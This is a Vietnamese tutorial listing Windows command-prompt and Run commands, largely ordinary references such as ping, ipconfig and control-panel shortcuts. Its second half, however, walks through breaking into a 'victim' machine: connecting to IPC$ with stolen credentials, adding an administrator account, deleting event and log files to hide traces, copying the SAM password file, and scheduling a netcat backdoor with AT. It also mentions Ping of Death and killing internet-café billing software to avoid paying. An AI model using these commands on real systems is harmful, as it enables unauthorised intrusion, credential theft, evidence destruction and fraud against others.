Embed Size (px)
Citation preview
Đầu tiên hãy mở cửa sổ command prompt ra đã nhé
1. Lệnh Ping: Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Cú pháp: ping ip/host [/t][/a][/l][/n]trong đó:- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C- Tham số /a: Nhận địa chỉ IP từ tên host- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi chưa lần nào thử tấn công thành công . Ví dụ: ping 174.178.0.1 /l 65535 - Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5Ngoài ra, còn một số thông tin linh tinh khác, bạn có thể tự tham khảo với câu lệnh ping /?
Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....
Bây giờ hãy thử ping đến địa chỉ 174.178.0.1 (con server của trường đó ), và thử tiếp cái khoacntt (con server đặt forum này đây ), sau đó bịa ra một IP hoặc một host nào đó thử xem kết quả ra sao
Chú ý: Nếu như mạng LAN không sử dụng phương pháp chia sẻ mạng bằng proxy, bạn có thể ping đến các máy chủ khác ở ngoài như hay chẳng hạn . Ở trong quán chat, nếu thấy trình duyệt không hiển thị được, hãy thử lênh này để xem cái máy chủ đó có kết nối mạng không nhé
2. Lệnh Tracert.Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.
Cú pháp: tracert ip/host
3. Lệnh gửi thông điệp qua mạng (chỉ sử dụng trên hệ thống máy Win NT/2000/XP):Cú pháp: net send ip/host dong_thong_diepLệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp dong_thong_diep. Trước đây, tui với lão DVC102 toàn chat bằng kiểu này Ví dụ: net send khoacntt Ong Cuong oi, uong cafe khong!
Bạn có thể dùng lệnh net send * để gửi thông điệp tới tất cả các máy con trên mạng (miễn là nó xài HĐH Win NT/2000/XP):
net send * Hi all
4. Lệnh kiểm tra các cổng mở.Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta. Nếu ra quán Net, bạn sử dụng lệnh này mà thấy mấy cái port đang ở chế độ listening lạ hoắc thì yên chí là máy đó dính trojan rồi đấy. Cẩn thận kẻo mất oven:
Cú pháp:Netstat [/a][/e][/n]- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)- Tham số /e: hiển thị các thông tin thống kê Ethernet- Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối...Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm
5. Lệnh IPconfigLệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng... Thì cũng phải biết xem cái máy tính của mình ra sao chứ?
Cú pháp: ipconfig /all
6. Lệnh truyền tải file ftp: FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ Cú pháp: ftp ip/hostNếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau:
ftp>_
Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute
Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, oven. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ.
Một số lệnh ftp cơ bản:
- cd thu_muc: chuyển sang thư mục khác trên máy chủ- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ- mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ- put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.- close: Đóng phiên làm việc
- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.
Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu.
Như vậy, từ nay trở đi, nếu bạn nào có một website riêng thì không cần phải lo đến chuyện phải có chương trình ftp nữa nhé. Dùng lệnh này, đảm bảo chạy ở đâu cũng được (tất nhiên trừ những mạng máy tính sử dụng proxy.
7. Lệnh net viewLệnh này cho phép xem danh sách các máy trong mạng, hoặc các chia sẻ tại một máy trên mạng:
Cú pháp: Net view [\\computer|/Domain[:ten_domain]]Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.
117 câu lệnh CMD và 1 số lệnh trong Run
117 CÂU LỆNH TRONG CMD:
1. Accessibility Controls - access.cpl2. Accessibility Wizard - accwiz3. Add Hardware Wizard - hdwwiz.cpl4. Add/Remove Programs - appwiz.cpl5. Administrative Tools - control admintools6. Automatic Updates - wuaucpl.cpl7. Bluetooth Transfer Wizard - fsquirt8. Calculator - calc9. Certificate Manager - certmgr.msc10. Character Map - charmap11. Check Disk Utility - chkdsk12. Clipboard Viewer - clipbrd13. Command Prompt - cmd14. Component Services - dcomcnfg15. Computer Management - compmgmt.msc16. Control Panel - control17. Date and Time Properties - timedate.cpl18. DDE Shares - ddeshare19. Device Manager - devmgmt.msc20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr22. Disk Defragment - dfrg.msc23. Disk Management - diskmgmt.msc24. Disk Partition Manager - diskpart25. Display Properties - control desktop26. Display Properties - desk.cpl27. Dr. Watson System Troubleshooting Utility - drwtsn3228. Driver Verifier Utility - verifier29. Event Viewer - eventvwr.msc30. Files and Settings Transfer Tool - migwiz31. File Signature Verification Tool - sigverif32. Findfast - findfast.cpl33. Firefox - firefox34. Folders Properties - control folders35. Fonts - control fonts36. Fonts Folder - fonts37. Free Cell Card Game - freecell38. Game Controllers - joy.cpl39. Group Policy Editor (for xp professional) - gpedit.msc40. Hearts Card Game - mshearts41. Help and Support - helpctr42. HyperTerminal - hypertrm43. Iexpress Wizard - iexpress44. Indexing Service - ciadv.msc45. Internet Connection Wizard - icwconn146. Internet Explorer - iexplore47. Internet Properties - inetcpl.cpl48. Keyboard Properties - control keyboard49. Local Security Settings - secpol.msc50. Local Users and Groups - lusrmgr.msc51. Logs You Out Of Windows - logoff52. Malicious Software Removal Tool - mrt53. Microsoft Chat - winchat54. Microsoft Movie Maker - moviemk55. Microsoft Paint - mspaint56. Microsoft Syncronization Tool - mobsync57. Minesweeper Game - winmine58. Mouse Properties - control mouse59. Mouse Properties - main.cpl60. Netmeeting - conf61. Network Connections - control netconnections62. Network Connections - ncpa.cpl63. Network Setup Wizard - netsetup.cpl64. Notepad notepad65. Object Packager - packager66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk68. Outlook Express - msimn69. Paint - pbrush70. Password Properties - password.cpl71. Performance Monitor - perfmon.msc72. Performance Monitor - perfmon73. Phone and Modem Options - telephon.cpl74. Phone Dialer - dialer75. Pinball Game - pinball76. Power Configuration - powercfg.cpl77. Printers and Faxes - control printers78. Printers Folder - printers79. Regional Settings - intl.cpl80. Registry Editor - regedit81. Registry Editor - regedit3282. Remote Access Phonebook - rasphone83. Remote Desktop - mstsc84. Removable Storage - ntmsmgr.msc85. Removable Storage Operator Requests - ntmsoprq.msc86. Resultant Set of Policy (for xp professional) - rsop.msc87. Scanners and Cameras - sticpl.cpl88. Scheduled Tasks - control schedtasks89. Security Center - wscui.cpl90. Services - services.msc91. Shared Folders - fsmgmt.msc92. Shuts Down Windows - shutdown93. Sounds and Audio - mmsys.cpl94. Spider Solitare Card Game - spider95. SQL Client Configuration - cliconfg96. System Configuration Editor - sysedit97. System Configuration Utility - msconfig98. System Information - msinfo3299. System Properties - sysdm.cpl100. Task Manager - taskmgr101. TCP Tester - tcptest102. Telnet Client - telnet103. User Account Management - nusrmgr.cpl104. Utility Manager - utilman105. Windows Address Book - wab106. Windows Address Book Import Utility - wabmig107. Windows Explorer - explorer108. Windows Firewall - firewall.cpl109. Windows Magnifier - magnify110. Windows Management Infrastructure - wmimgmt.msc111. Windows Media Player - wmplayer112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey114. Windows Update Launches - wupdmgr115. Windows Version - winver116. Windows XP Tour Wizard - tourstart117. Wordpad - write
1 Số lệnh trong Run
Đây là 1 số lệnh:1. Character Map = charmap.exe (rất hữu dụng trong việc tìm kiếm các ký tự không thông dụng)2. Disk Cleanup = cleanmgr.exe (dọn dẹp đĩa để tăng dung lượng trống)3. Clipboard Viewer = clipbrd.exe (Xem nội dung của Windows clipboard)4. Dr Watson = drwtsn32.exe (Công cụ gỡ rối)5. DirectX diagnosis = dxdiag.exe (Chẩn đoán và thử DirectX, card màn hình & card âm thanh)6. Private character editor = eudcedit.exe (cho phép tạo ra hoặc sửa đổi các ký tự(nhân vật?))7. IExpress Wizard = iexpress.exe (Tạo ra các file nén tự bung hoặc các file tự cài đặt)8. Mcft Synchronization Manager = mobsync.exe (cho phép đồng bộ hóa thư mục trên mạng cho làm việc Offline. Không được cung cấp tài liệu rõ ràng).9. Windows Media Player 5.1 = mplay32.exe (phiên bản cũ của Windows Media Player, rất cơ bản).10. ODBC Data Source Administrator = odbcad32.exe (Làm một số việc với các cơ sở dữ liệu)11. Object Packager = packager.exe (Làm việc với các đối tượng đóng gói cho phép chèn file vào, có các file trợ giúp toàn diện).12. System Monitor = perfmon.exe (rất hữu ích, công cụ có tính cấu hình rất cao, cho bạn biết mọi thứ bạn muốn biết về bất kỳ khía cạnh nào của hiệu suất PC, for uber-geeks only )13. Program Manager = progman.exe (Legacy Windows 3.x desktop shell).14. Remote Access phone book = rasphone.exe (Tài liệu là ảo, không tồn tại).15. Registry Editor = regedt32.exe [also regedit.exe] (dành cho việc chỉnh sửa Windows Registry).16. Network shared folder wizard = shrpubw.exe (Tạo các thư mục được chia sẻ trên mạng).17. File siganture verification tool = sigverif.exe18. Volume Contro = sndvol32.exe (Tôi bổ sung cái này cho những người bị mất nó từ vùng cảnh báo của hệ thống).19. System Configuration Editor = sysedit.exe (Sửa đổi System.ini & Win.ini giống như Win98! ).20. Syskey = syskey.exe (bảo mật cơ sở dữ liệu tài khoản WinXP - cẩn thận khi sử dụng, Nó không được cung cấp tài liệu nhưng hình như nó mã hóa tất cả các mật khẩu, Tôi không chắc về chức năng đầy đủ của nó).
21. Mcft Telnet Client = telnet.exe22. Driver Verifier Manager = verifier.exe (có vẻ như là một tiện ích theo dõi hoạt động của các Driver(trình điều khiển) phần cứng ,có thể hữu ích đối với người gặp sự cố với các Driver. Khộng được cung cấp tài liệu)23. Windows for Workgroups Chat = winchat.exe (Xuất hiện như là 1 tiện ích WinNT cũ cho phép chat trong mạng LAN,có file trợ giúp).24. System configuration = msconfig.exe (Có thể sử dụng để quản lý các chương trình khởi động cùng với Windows)25. gpedit.msc được sử dụng để quản lý các chính sách nhóm và các quyền hạn.here are more 99 commandsAccessibility Controls: access.cplAdd Hardware Wizard: hdwwiz.cplAdd/Remove Programs:cappwiz.cplAdministrative Tools: control admintoolsAutomatic Updates: wuaucpl.cplBluetooth Transfer Wizard: fsquirtCalculator: calcCertificate Manager: certmgr.mscCharacter Map: charmapCheck Disk Utility:chkdskClipboard Viewer: clipbrdCommand Prompt: cmdComponent Services: dcomcnfgComputer Management: compmgmt.mscDate and Time Properties: timedate.cplDDE Shares: ddeshareDevice Manager: devmgmt.mscDirect X Control Panel (If Installed)*: directx.cplDirect X Troubleshooter: dxdiagDisk Cleanup Utility: cleanmgrDisk Defragment: dfrg.mscDisk Management: diskmgmt.mscDisk Partition Manager: diskpartDisplay Properties: control desktopDisplay Properties: desk.cplDisplay Properties (w/Appearance Tab Preselected): control colorDr. Watson System Troubleshooting Utility: drwtsn32Driver Verifier Utility: verifierEvent Viewer: eventvwr.mscFile Signature Verification Tool: sigverifFindfast: findfast.cplFolders Properties: control foldersFonts: control fontsFonts Folder: fontsFree Cell Card Game: freecellGame Controllers: joy.cpl
Group Policy Editor (XP Prof): gpedit.mscHearts Card Game: msheartsIexpress Wizard: iexpressIndexing Service: ciadv.mscInternet Properties: inetcpl.cplIP Configuration (Display Connection Configuration): ipconfig /allIP Configuration (Display DNS Cache Contents): ipconfig /displaydnsIP Configuration (Delete DNS Cache Contents): ipconfig /flushdnsIP Configuration (Release All Connections): ipconfig /releaseIP Configuration (Renew All Connections): ipconfig /renewIP Configuration (Refreshes DHCP & Re-Registers DNS): ipconfig /registerdnsIP Configuration (Display DHCP Class ID): ipconfig /showclassidIP Configuration (Modifies DHCP Class ID): ipconfig /setclassidava Control Panel (If Installed): jpicpl32.cplJava Control Panel (If Installed): javawsKeyboard Properties: control keyboardLocal Security Settings: secpol.mscLocal Users and Groups: lusrmgr.mscLogs You Out Of Windows: logoffMicrosoft Chat: winchatMinesweeper Game: winmineMouse Properties: control mouseMouse Properties: main.cplNetwork Connections: control netconnectionsNetwork Connections: ncpa.cplNetwork Setup Wizard: netsetup.cplNotepad: notepadNview Desktop Manager (If Installed): nvtuicpl.cplObject Packager: packagerODBC Data Source Administrator: odbccp32.cplOn Screen Keyboard: oskOpens AC3 Filter (If Installed): ac3filter.cplPassword Properties: password.cplPerformance Monitor: perfmon.mscPerformance Monitor: perfmonPhone and Modem Options: telephon.cplPower Configuration: powercfg.cplPrinters and Faxes: control printersPrinters Folder: printersPrivate Character Editor: eudceditQuicktime (If Installed): QuickTime.cplRegional Settings: intl.cplRegistry Editor: regeditRegistry Editor: regedit32emote Desktop: mstscRemovable Storage: ntmsmgr.msc
Removable Storage Operator Requests: ntmsoprq.mscResultant Set of Policy (XP Prof): rsop.mscScanners and Cameras: sticpl.cplScheduled Tasks: control schedtasksSecurity Center: wscui.cplServices: services.mscShared Folders: fsmgmt.mscShuts Down Windows: shutdownSounds and Audio: mmsys.cplSpider Solitare Card Game: spiderSQL Client Configuration: cliconfgSystem Configuration Editor: syseditSystem Configuration Utility: msconfigSystem File Checker Utility (Scan Immediately): sfc /scannowSystem File Checker Utility (Scan Once At Next Boot): sfc /scanonceSystem File Checker Utility (Scan On Every Boot): sfc /scanbootSystem File Checker Utility (Return to Default Setting): sfc /revertSystem File Checker Utility (Purge File Cache): sfc /purgecacheSystem File Checker Utility (Set Cache Size to size x): sfc /cachesize=xSystem Properties: sysdm.cplTask Manager:taskmgrTelnet Client:telnetUser Account Management:nusrmgr.cplUtility Manager:utilmanWindows Firewall:firewall.cplWindows Magnifier:magnifyWindows Management Infrastructure:wmimgmt.mscWindows System Security Tool:syskeyWindows Update Launches:wupdmgrWindows XP Tour Wizard:tourstartWordpad:write hoặc wordpad (IMG:style_emoticons/default/107.gif)Ngoài ra cũng có thể xem thêm hướng dẫn về cmd trong Start -> Help and Support của Windows.
1. Lệnh Ping: Phân tích sự kết nối đến một máy từ xa trên mạng. Lệnh này chỉ có hiệu lực khi máy bạn đã cài giao thức TCP/IP.Cú pháp: ping ip/host [/t][/a][/l][/n]- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C- Tham số /a: Nhận địa chỉ IP từ tên host- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều
máy tính cùng ping một lượt.- Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5Công dụng :+ Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....
2. Lệnh Tracert:Cú pháp: tracert ip/hostCông dụng :+ Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.
3. Lệnh Net Send: gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP):Cú pháp: Net send ip/host thông_điệp_muốn_gởiCông dụng:+ Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi.+ Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :Code: Net send * hello!I'm pro_hacker_invn
4. Lệnh Netstat:Cú pháp: Netstat [/a][/e][/n]- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)- Tham số /e: hiển thị các thông tin thống kê Ethernet- Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối...Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêmCông dụng :+ Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.
5. Lệnh IPCONFIG:Cú pháp: ipconfig /allCông dụng:+ Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...
6. Lệnh FTP (truyền tải file):Cú pháp: ftp ip/hostNếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau:
Code: ftp>_Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP.Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ.
Một số lệnh ftp cơ bản:
- cd thu_muc: chuyển sang thư mục khác trên máy chủ- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ- mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ- put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.- close: Đóng phiên làm việc- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu.Công dụng :+ FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp
7. Lệnh Net View:Cú pháp: Net View [\\computer|/Domain[:ten_domain]]Công dụng:+ Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.+ Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.
8. Lệnh Net Use:Cú pháp: Net use \\ip\ipc$ "pass" /user:"######"- ip: địa chỉ IP của victim.- ######: user của máy victim- pass: password của userGiả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau:Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim"Công dụng:+ kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).
9. Lệnh Net User:Cú pháp: Net User [username pass] [/add]- Username : tên user cấn add- pass : password của user cần add
Khi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator.Code: Net Localgroup Adminstrator [username] [/add]Công dụng:+ Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính.+ Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào.Ví dụ: ta tiến hành add thêm một user có tên là :xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau:Code: Net User xuanhoa banvatoi /addSau đó add user xuanhoa vào nhóm adminnistratorCode: Net Localgroup Administrator xuanhoa /add
10. Lệnh Shutdown:Cú pháp: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up:xx:yy] (áp dụng cho win XP)- Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,..- Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown.- Tham số -l : logg off (lưu ý ko thể thực hiện khi remote)- Tham số -s : shutdown- Tham số -r : shutdown và restart- Tham số -a : không cho shutdown- Tham số -f : shutdown mà ko cảnh báo- Tham số -c "comment" : lời cảnh báo trước khi shutdown- Tham số -d up:xx:yy : ko rõCode: shutdown \\ip (áp dụng win NT)Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn!Công dụng:+ Shutdown máy tính.
11. Lệnh DIR:Cú pháp: DIR [drive:][path][filename]Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn.Công dụng:+ Để xem file, folder.
12. Lệnh DEL:Cú pháp: DEL [drive:][path][filename]Lệnh này cũng căn bản rùi, ko phải nói nhìu.Công dụng:Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:Code:del C:\winnt\system32\logfiles\*.*del C:\winnt\ssytem32\config\*.evtdel C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.logdel C:\winnt\system32\*.txtdel C:\winnt\*.txtdel C:\winnt\*.log
13. Lệnh tạo ổ đĩa ảo trên computer:Cú pháp: Net use z: \\ip\C$ ( hoặc là IPC$ )- Z là của mình...còn C$ là của VictimCông dụng:Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)
14. Lệnh Net Time:Cú pháp: Net Time \\ipCông dụng:+ Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT:Cú pháp: AT \\ipCông dụng:+ Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng.Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .Code: Net Time \\68.135.23.25Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.Code: AT \\68.135.23.25 12:3 nc.exeĐợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet:Cú pháp: telnet host portGõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKieCode: telnet 68.135.23.25 99Công dụng:+ Kết nối đến host qua port xx
17. Lệnh COPY:Cú pháp: COPY /?Dùng lệnh trên để rõ hơn!Công dụng:+ Copy file, tui khỏi nói thêm nhé.Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1Code: Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNtCode: Copy index.html \\127.0.0.1\admin$\index.htmlmuốn copy files trên máy victm thì bạn gõ vào :Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET:Cú pháp: SETCông dụng:+ Displays, sets, or removes cmd.exe enviroment variables.
19. Lệnh Nbtstat:Cú pháp: Nbtstat /?Gõ lệnh trên để rõ hơn về lệnh này.Công dụng:+ Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP)
20. Lệnh Date:Cú pháp: Date /T+ Công dụng:+ Nếu chỉ gõ lệnh date thì hệ thống sẽ hiển thị ngày giờ hệ thống và yêu cầu bạn nhập ngày giờ mới để edit.+ Nếu gõ lệnh date /t thì bạn chỉ coi thông tin về ngày giờ hệ thống!
21. Lệnh xuất thông tin thành file *.txt:Cú pháp: Câu lệnh >[drive]:\[path]\tenfile.txtCông dụng:+ xuất một tham số nào đó ra 1 file text .Ví dụ: bạn đánh lệnh sau:Code: ipconfig >C:\myip.txtHệ thống sẽ tạo ra file myip.txt lưu ở ổ đĩa C với thông tin là IP, Gateway, Subnet Mask
22. Lệnh openfiles:Cú pháp: OpenFiles /Disconnect /ID id hoặc OpenFiles /Disconnect /A tên-truy-cậpCông dụng:+ Cho biết ai đang dùng các tập tin (thư mục) mà bạn đang chia sẽ trên hệ thống mạng
23. Lệnh Recover:Cú pháp: Recover /?Đánh lệnh recover /? để biết thêm chi tiết nhé!Công dụng:+ Để "cứu" một file nào đó bị hỏng khi file đó nằm trên vùng đĩa hư (bad sector chăng hạn). Chỉ hoạt động khi hệ thống file của bạn là NTFS (Fat32/Fat không dùng được đâu nhé). Nó dở 1 chỗ là dùng lệnh này cho từng file một nên có nhiều file hư các bạn nên tìm tiện ích của các hãng thứ 3
24. Lệnh Tasklist:Cú pháp: Tasklist
Công dụng:+ Liệt kê các tác vụ (các chương trình ứng dụng đang chạy trong bộ nhớ máy tính) chi tiết. Sẽ cho bạn biết tên process đang chạy. Process là một luồng xử lý được CPU cấp riêng khi thực thi một ứng dụng (chương trình) hay PID (Process ID). TaskList hữu ích khi dùng với Taskkill.+ Để hiểu rõ hơn về lệnh này, hãy gõ /? sau cấu trúc lệnh nhé!
25. Lệnh Taskkill:Cú pháp: Taskkill /PID proccess id (Đừng quên thêm /? sau cấu trúc lệnh để hiểu rõ hơn nhé!)Công dụng:+ Để "kill" một "task" đang chạy trong bộ nhớ. Lợi hại lắm đấy, khi ra net gặp quán nào nó cái DWK hay Netcafe thì mình tắt nó đi cái một!Ví dụ:Đầu tiên ta dùng lệnh tasklist để biết được groccess id của chương trình cần tắt.Code: tasklistỞ đây tôi thí dụ như tôi cần DWK có groccess id là 524 thì ta dùng lệnh taskkill để tắt nó đi như sau:Code: taskkill /PID 524 /ftham số /f là để tắt ứng dụng đó đi một cách hoàn toàn! Gọi là tắt hoàn toàn vậy thui chứ minh run hoặc khởi đọng lại là nó vẫn chạy bình thường ah! Lợi dụng ứng dụng này ta có thể làm giảm bớt chi phí ngồi net bằng cách tắt easy cafe đi. Chừng nào gần về rùi hãy mở lại hoặc nhấn nút reset là xong! He he! Nhưng nhớ phải làm cho khéo kẻo bị đập đó!
26. Lệnh Compact:Cú pháp:Compact [/c] [/a] [/f] [/q]- tham số /c : chỉ định nén một file nào đó- tham số /u : giải nén một file nào đó- Các tham số còn lại tự ngâm cứu thêm nhé!Công dụng:+ Tương tự như chức năng tiết kệm dung lượng đĩa trên Windows XP hay 2003 (Vista) - chỉ có khi dùng NTFS là "Compress Contents To Save Disk Space". Các bạn có nhiều kiểu làm như click phải chuột vào một file chọn Properties -> Advanced rồi check vào ô tiết kiệm dung lượng cho file này "Compress file to save disk space". Nhưng khi các bánj muốn nén tất các file có phần mở rộng là *.* thì Compact là lựa chọn tốt nhất .Ví dụ:Cú pháp: Code: compact /c *.exe27.
27. Lệnh control:Cú pháp: controlCông dụng:+ Mở control panel bằng CMD
28. Lệnh getmac:Cú pháp: getmacCông dụng:
+ lấy thông tin địa chỉ MAC (Media Access Control) từ card mạng.
29. Lệnh systeminfo:Cú pháp: systeminfoCông dụng:+ hiện thị thông tin của hệ thống từ cấu hình cơ bản, loại CPU, khu vực địa lý, các bản hotfix (bản cập nhập) đã cài trong máy, v.v...
30. Lệnh tree:Cú pháp: tree [ổ đĩa]:[đường dẫn] [/f] [/a]- Tham số /f : hiển thị tên của file trong mỗi thư mục- Tham số /a : ko rõCông dụng:+ Hiển thị cấu trúc thư mục dạng cây!
